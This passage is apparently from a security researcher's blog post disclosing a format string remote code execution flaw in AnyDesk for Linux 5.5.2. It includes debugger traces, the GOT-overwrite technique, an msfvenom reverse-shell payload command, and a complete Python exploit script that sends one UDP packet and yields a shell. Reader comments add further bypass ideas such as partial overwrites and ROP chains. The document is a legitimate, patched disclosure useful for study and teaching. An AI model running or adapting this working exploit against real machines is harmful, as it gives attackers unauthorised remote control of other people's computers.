user@w00d:~$ ./sample1 
                                                                                            ffffded4
out = 100

In this case the field width was statically set to 100. But we can also use a dynamic field width:

user@w00d:~$ cat sample2.c 
#include <stdio.h>

int main() {

  int out;
  int field_width = 123;
  printf("%1$*2$x%1$n", &out, field_width);
  printf("\nout = %d\n", out);

  return 0;
}

We introduced a new variable called field_width, which is passed as the second argument to printf. Also we changed the %100x format specifier to %1$*2$x. At first the syntax might look a little bit confusing, but actually it is quite simple: The 1$ at the beginning determines which value we want to print. In this case we just take the first argument, just like the %100x did (%x prints the lower 4 bytes of the address of out). This is separated by an asterisk (*) from the second part: 2$. This determines which value should be used for the field width, in this case the variable field_width, which is the second argument. Accordingly, when running the program, the value of field_width (123) is written to the variable out:

user@w00d:~$ ./sample2 
                                                                                                                   ffffded0
out = 123
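
For readers who want to experiment without compiling C, the same effect can be approximated in Python 3. This is only an analogy: Python's printf-style formatting has neither %n nor the m$ argument selectors, but it does support a field width taken from the arguments via *. The length of the resulting string is what a following %n would store.

```python
# Static field width: the width is part of the format string.
static = '%100x' % 0xffffded4

# Dynamic field width: '*' takes the width from the argument tuple,
# comparable to %1$*2$x in the C example above.
field_width = 123
dynamic = '%*x' % (field_width, 0xffffded0)

print(len(static))      # 100
print(len(dynamic))     # 123
print(dynamic.strip())  # ffffded0
```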

After this short introduction to the dynamic field width, let’s see how we can leverage this feature.

When inspecting all accessible parameters on the second call to vsnprintf (hostname), we can see that we can access the heap address of the format string. The reg_save_area is stored at 0x00007ffffffeb8b0. The value of gp_offset is 0x10, which means the first argument we can access is stored at 0x00007ffffffeb8b0 + 0x10 = 0x00007ffffffeb8c0:

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x11c5040 --> 0x21 ('!')
RCX: 0x7ffffffeb898 --> 0x3000000010 
RDX: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 49: Invalid UTF-8 encoded text in name - not valid '\205\376%4784x%165$ln'")
RSI: 0x400 
RDI: 0x7ffffffeafd0 --> 0x7 
RBP: 0x5 
RSP: 0x7ffffffeaaf0 --> 0x28e3 
RIP: 0x8ab346 (call   0x412d90 <vsnprintf@plt>)
R8 : 0x0 
R9 : 0x10 
R10: 0xffffffa7 
R11: 0x7ffff1548550 --> 0xfff08320fff08310 
R12: 0x7ffffffeb898 --> 0x3000000010 
R13: 0xb366d8 --> 0x62696c67 ('glib')
R14: 0x1412190 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 49: Invalid UTF-8 encoded text in name - not valid '\205\376%4784x%165$ln'")
R15: 0x4
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 49: Invalid UTF-8 encoded text in name - not valid '\205\376%4784x%165$ln'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaaf0 --> 0x28e3 
0008| 0x7ffffffeaaf8 --> 0x1e6 
0016| 0x7ffffffeab00 --> 0x158bf10 --> 0x0 
0024| 0x7ffffffeab08 --> 0x5ecbbcb0 
0032| 0x7ffffffeab10 --> 0x5ecbbcb0 
0040| 0x7ffffffeab18 --> 0x76cd1 
0048| 0x7ffffffeab20 --> 0xdd73d0 --> 0x8c3200 (mov    QWORD PTR [rdi],0xdd73d0)
0056| 0x7ffffffeab28 --> 0x3 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
gdb-peda$ x/2xw 0x7ffffffeb898
0x7ffffffeb898:	0x00000010	0x00000030
gdb-peda$ x/2xg 0x7ffffffeb898+8
0x7ffffffeb8a0:	0x00007ffffffeb970	0x00007ffffffeb8b0
gdb-peda$ x/4xg 0x00007ffffffeb8b0+0x10
0x7ffffffeb8c0:	0x0000000001412190	0x0000000000000000
0x7ffffffeb8d0:	0x00007ffff1784c40	0x0000000000000010

The first accessible argument at 0x00007ffffffeb8c0 is actually the heap address of the format string (0x0000000001412190). If we use this address as a dynamic field width, we can actually write its value to the time GOT entry.

By changing the hostname to the following value, we write the heap address plus the number of characters written so far (the error message and the two bytes of the invalid UTF-8 sequence) to the time GOT entry:

p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%165$ln', '\x85\xfe%18472249x%93$ln', 'ad', 'main')

After sending the frame we continue to the second call. The GOT entry is still untouched:

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x11c5040 --> 0x21 ('!')
RCX: 0x7ffffffeb898 --> 0x3000000010 
RDX: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 50: Invalid UTF-8 encoded text in name - not valid '\205\376%1$*1$x%165$ln'")
RSI: 0x400 
RDI: 0x7ffffffeafd0 --> 0x7 
RBP: 0x5 
RSP: 0x7ffffffeaaf0 --> 0x2db9 
RIP: 0x8ab346 (call   0x412d90 <vsnprintf@plt>)
R8 : 0x0 
R9 : 0x10 
R10: 0x21 ('!')
R11: 0x7ffff1548550 --> 0xfff08320fff08310 
R12: 0x7ffffffeb898 --> 0x3000000010 
R13: 0xb366d8 --> 0x62696c67 ('glib')
R14: 0x1570630 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 50: Invalid UTF-8 encoded text in name - not valid '\205\376%1$*1$x%165$ln'")
R15: 0x4
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 50: Invalid UTF-8 encoded text in name - not valid '\205\376%1$*1$x%165$ln'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaaf0 --> 0x2db9 
0008| 0x7ffffffeaaf8 --> 0x9d 
0016| 0x7ffffffeab00 --> 0x158df10 --> 0x0 
0024| 0x7ffffffeab08 --> 0x5ecbc775 
0032| 0x7ffffffeab10 --> 0x5ecbc775 
0040| 0x7ffffffeab18 --> 0x26709 
0048| 0x7ffffffeab20 --> 0xdd73d0 --> 0x8c3200 (mov    QWORD PTR [rdi],0xdd73d0)
0056| 0x7ffffffeab28 --> 0x3 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 1 "anydesk" hit Breakpoint 1, 0x00000000008ab346 in ?? ()
gdb-peda$ x/xg 0x119ddc0
0x119ddc0 <time@got.plt>:	0x00007ffff7ffb930

After executing the call the GOT entry contains the heap address 0x00000000015706b7:

gdb-peda$ ni
...
gdb-peda$ x/xg 0x119ddc0
0x119ddc0 <time@got.plt>:	0x00000000015706b7

The %n wrote the field width (the heap address of the format string, 0x1570630) plus the 135 characters that had already been written before the padded field (0x87). The resulting address (0x00000000015706b7) references the beginning of our format specifier:

gdb-peda$ x/s 0x00000000015706b7
0x15706b7:	"%1$*1$x%165$ln'"
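
The value found in the GOT entry can be checked with a few lines of Python 3. This is just a sketch of the arithmetic for this particular run; the constant and function names are made up for illustration.

```python
CHARS_BEFORE_SPECIFIER = 133 + 2  # error message + invalid UTF-8 bytes


def value_written_by_n(heap_addr, extra_padding=0):
    """Count stored by %ln after a field padded to heap_addr characters."""
    return CHARS_BEFORE_SPECIFIER + heap_addr + extra_padding


format_string_addr = 0x1570630  # R14 at the breakpoint above
print(hex(value_written_by_n(format_string_addr)))  # 0x15706b7
```

Because the format string starts at the heap address and our input begins 135 bytes into it, the written value is the address of the first byte after the invalid UTF-8 sequence, i.e. the start of our format specifiers.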

Since we want the address to point to actual shellcode, which we can append to the format string, we need to add a little more padding in order to skip over the format specifiers themselves. The specifiers in the following hostname are exactly 18 characters long, so it adds another 18 characters of padding (%18x) followed by a dummy shellcode (0xcc):

shellcode = '\xcc'
p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%18x%165$ln'+shellcode, '\x85\xfe%18472249x%93$ln', 'ad', 'main')

Now the GOT entry is overwritten with the address of the shellcode:

...
gdb-peda$ x/xg 0x119ddc0
0x119ddc0 <time@got.plt>:	0x0000000001379549

gdb-peda$ x/i 0x0000000001379549
   0x1379549:	int3   
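
The padding value is slightly self-referential: the %18x specifier is part of the very string it has to skip. The following Python 3 sketch (helper names are made up for illustration) searches for a padding value that equals the length of the complete specifier sequence, assuming the hostname layout used above.

```python
def hostname_specifiers(pad):
    """Format specifiers placed between the invalid bytes and the shellcode."""
    return '%1$*1$x' + '%{}x'.format(pad) + '%165$ln'


def find_padding(limit=1000):
    """Smallest pad for which the padding equals the specifier length."""
    for pad in range(1, limit):
        if len(hostname_specifiers(pad)) == pad:
            return pad
    raise ValueError('no consistent padding found')


pad = find_padding()
print(pad)                       # 18
print(hostname_specifiers(pad))  # %1$*1$x%18x%165$ln
```

With this padding the value written to the GOT entry is the heap address plus 135 plus 18, which is the first byte after the specifiers.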

Final exploit

Finally it is time to generate a real payload:

kali@kali:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
...

Please notice the bad bytes. 0x00 is excluded to prevent the string from being terminated. 0x25 (%) would introduce another format specifier and 0x26 (&) is used by glib and must also be avoided.
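
Before embedding a payload it can be worth double-checking that it really is free of these bytes. A minimal Python 3 sketch, with a made-up helper name and two tiny sample inputs instead of the real payload:

```python
BAD_BYTES = b'\x00\x25\x26'  # NUL, '%' and '&' as explained above


def find_bad_bytes(payload, bad=BAD_BYTES):
    """Return (offset, byte) pairs for every forbidden byte in payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


print(find_bad_bytes(b'\xcc'))        # []
print(find_bad_bytes(b'\x90%\x00'))   # [(1, 37), (2, 0)]
```

An empty list means the payload can be appended to the format string without terminating it or introducing additional specifiers.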

The final exploit script looks like this:

#!/usr/bin/env python2
# Python 2 proof of concept: str and bytes are concatenated freely below.

import struct
import socket

ip = '127.0.0.1'
port = 50001

def gen_discover_packet(ad_id, os, hn, user, inf, func):
  d  = chr(0x3e)+chr(0xd1)+chr(0x1)
  d += struct.pack('>I', ad_id)
  d += struct.pack('>I', 0)
  d += chr(0x2)+chr(os)
  d += struct.pack('>I', len(hn)) + hn
  d += struct.pack('>I', len(user)) + user
  d += struct.pack('>I', 0)
  d += struct.pack('>I', len(inf)) + inf
  d += chr(0)
  d += struct.pack('>I', len(func)) + func
  d += chr(0x2)+chr(0xc3)+chr(0x51)
  return d


shellcode =  b""
shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48"
shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\x59\x88\xc6"
shellcode += b"\x9c\x5f\xfe\x71\x38\x48\x31\x58\x27\x48\x2d"
shellcode += b"\xf8\xff\xff\xff\xe2\xf4\x33\xa1\x9e\x05\x35"
shellcode += b"\xfc\x2e\x52\x58\xd6\xc9\x99\x17\x69\x39\x81"
shellcode += b"\x5b\x88\xd7\xc0\x20\xfe\x71\x39\x08\xc0\x4f"
shellcode += b"\x7a\x35\xee\x2b\x52\x73\xd0\xc9\x99\x35\xfd"
shellcode += b"\x2f\x70\xa6\x46\xac\xbd\x07\xf1\x74\x4d\xaf"
shellcode += b"\xe2\xfd\xc4\xc6\xb6\xca\x17\x3b\xe1\xa8\xb3"
shellcode += b"\x2c\x96\x71\x6b\x11\x01\x21\xce\x08\xb6\xf8"
shellcode += b"\xde\x56\x8d\xc6\x9c\x5f\xfe\x71\x38"

print('sending payload ...')
p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%18x%165$ln'+shellcode, '\x85\xfe%18472249x%93$ln', 'ad', 'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()
print('reverse shell should connect within 5 seconds')
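
The packet builder in the script encodes every string the same way: a 4-byte big-endian length followed by the raw bytes. The following is a minimal sketch of that encoding and its inverse. The helper names pack_field and unpack_field are made up for illustration and are not part of AnyDesk or of the exploit script:

```python
import struct

def pack_field(data):
    """Encode a field as a 4-byte big-endian length followed by the raw bytes."""
    return struct.pack('>I', len(data)) + data

def unpack_field(buf, offset=0):
    """Decode one field at offset; return (data, offset of the next field)."""
    (length,) = struct.unpack_from('>I', buf, offset)
    start = offset + 4
    end = start + length
    if end > len(buf):
        raise ValueError('field length exceeds buffer')
    return buf[start:end], end

# Two fields back to back, as in the tail of the discovery packet.
encoded = pack_field(b'ad') + pack_field(b'main')
first, nxt = unpack_field(encoded)
second, _ = unpack_field(encoded, nxt)
print(first, second)
```

The explicit bounds check in unpack_field is the kind of validation a receiver of such length-prefixed fields would need.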

Before running the exploit, we start a netcat (nc) listener on port 4444:

user@w00d:~$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)

Now we run the exploit script:

user@w00d:~$ ./final_exploit.py 
sending payload ...
reverse shell should connect within 5 seconds

After a few seconds, the front-end updates its online states, which triggers the exploit. The shellcode is executed and we receive a reverse shell:

...
Connection from localhost 52000 received!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

Conclusion

By sending a single UDP packet to the target machine, we can exploit the discovered format string vulnerability to gain Remote Code Execution. To achieve this, we triggered the vulnerability twice: once to write the address of the GOT entry of the time function to the stack, and a second time to write the heap address of our shellcode to that GOT entry using a dynamic field width.

Please keep in mind that this is a proof-of-concept exploit targeting AnyDesk Linux version 5.5.2. The exploit was developed for Ubuntu 18.04.4 LTS at the time of writing. To run it successfully against other targets, it will probably need to be adjusted.

Lastly, I would like to thank AnyDesk for the immediate and professional reaction. A patch fixing the vulnerability was released only three days after my notification. Following my suggestion, the patch also enabled full RELRO. This remaps the GOT as read-only, preventing an attacker from overwriting a GOT entry.
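
Whether a binary was built with full RELRO can be read from its ELF headers. The following is a minimal sketch of a common heuristic, assuming the text output of readelf -l and readelf -d is already available as strings. The function name relro_level is hypothetical, and the sample strings are abbreviated illustrations, not output from the AnyDesk binary:

```python
def relro_level(program_headers, dynamic_section):
    """Classify RELRO from the text output of `readelf -l` and `readelf -d`."""
    if 'GNU_RELRO' not in program_headers:
        return 'none'      # no read-only relocation segment at all
    if 'BIND_NOW' in dynamic_section:
        return 'full'      # symbols resolved at startup, GOT remapped read-only
    return 'partial'       # the lazily bound part of the GOT stays writable

# Abbreviated, illustrative inputs.
headers = 'LOAD ...\nGNU_RELRO ...\n'
print(relro_level(headers, '(FLAGS) BIND_NOW'))
print(relro_level(headers, '(NEEDED) Shared library: [libc.so.6]'))
print(relro_level('LOAD ...\n', ''))
```

With only partial RELRO, a GOT overwrite like the one used in this article remains possible.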

It is great to see security being taken seriously.

Thanks for reading the article 🙂

Timeline
18/02/20 – Vendor Notification
19/02/20 – Vendor Acknowledgement
21/02/20 – Vendor Patch
09/06/20 – Public Disclosure

9 Replies to “AnyDesk UDP Discovery Remote Code Execution (CVE-2020-13160)”

  1. The most difficult part is finding two stack values that are reliable as format string arguments …
    But what if the heap is not marked rwx and the stack is marked rwx instead?

    1. Yes, in this case the stack differs depending on whether the format string vulnerability is triggered by the username or by the hostname. You can increase reliability by using values further down the stack, as these are more likely to stay the same between both calls.
      If the heap is not marked as rwx, you cannot use the strategy described here. The main challenge was to defeat ASLR with a single shot (no leak). The dynamic field width is one way to do this, but it probably won’t work with the stack, since stack addresses exceed 4 bytes and the dynamic field width only uses 4 bytes. Another approach would be a partial overwrite (overwriting only the least significant bytes of a function pointer or return address and leaving the upper bytes, which are determined by ASLR, untouched) in order to set the instruction pointer to a controlled memory address marked as rwx. If this is not possible either, another strategy might be to actually leak an address, e.g. by finding a way to transmit an address via a UDP broadcast. Also keep in mind that PIE is not enabled for the binary, which means that the addresses of the binary itself are not affected by ASLR. Although a format string vulnerability is not as convenient as a classical buffer overflow for storing a ROP chain, it is possible. You could store the ROP chain at a known address (from the binary) by triggering the format string vulnerability multiple times and then finally overwrite a GOT entry with the address of a gadget that sets the stack pointer to this address.

  2. What a nice piece of analysis. I’ve added this as a CTF target in one of my courses. The exploit seems rock solid on 18.04.4.

  3. it’s also stable on 18.04.6
    and it also works with kernel 4.15 which could be relevant if you need to host the box on e.g. AWS/EC².
    Then you’d need to start off with Ubuntu server 18.04.6 (kernel 4.15 as opposed to 5.4 with Ubuntu Desktop 18.04!) and then install the ubuntu-desktop packages.
